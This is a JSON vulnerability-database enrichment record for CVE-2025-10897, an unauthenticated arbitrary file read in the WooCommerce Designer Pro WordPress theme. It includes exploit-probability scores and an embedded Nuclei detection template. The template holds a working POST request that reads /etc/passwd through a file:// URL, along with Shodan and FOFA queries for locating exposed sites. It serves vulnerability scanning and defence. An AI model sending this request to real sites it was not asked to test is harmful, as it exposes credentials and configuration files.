{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-10897/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-10897/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-10897/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-10897/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-10897/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-10897/enrichment"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-10897"
    },
    "vulnerability": {
      "href": "/api/v1/vulnerability/cve-2025-10897"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.01947,
      "kev": false,
      "percentile": 0.80195
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-10897.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-10897\n\ninfo:\n  name: WooCommerce Designer Pro <= 1.9.28 - Arbitrary File Read\n  author: 0x_Akoko\n  severity: high\n  description: |\n   WooCommerce Designer Pro theme for WordPress <= 1.9.28 contains an arbitrary file read vulnerability caused by improper input validation, letting unauthenticated attackers read arbitrary files including sensitive configuration files, exploit requires no authentication.\n  impact: |\n   Unauthenticated attackers can read sensitive files, potentially exposing database credentials and other critical information.\n  remediation: |\n   Update to the latest version beyond 1.9.28.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-designer-pro/woocommerce-designer-pro-1928-unauthenticated-arbitrary-file-read\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-10897\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2025-10897\n    epss-score: 0.01947\n    epss-percentile: 0.80255\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"wc-designer-pro\"\n    shodan-query: http.html:\"wc-designer-pro\"\n  tags: cve,cve2025,wordpress,wp,wp-plugin,wc-designer-pro,lfi,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wcdp_convert_resource_cmyk&url=file:///etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"success\"\n          - \"base64\"\n          - \"cm9vdDp4OjA6MDpy\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221009875fbe706de5577d59e636ebca79b5907e8a89b85ca08ea9832f23456feb453022100e8d53333e09276590b7c9dc89d2617c00ca0370e562172217ec63195dc3372b0:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-10897"
}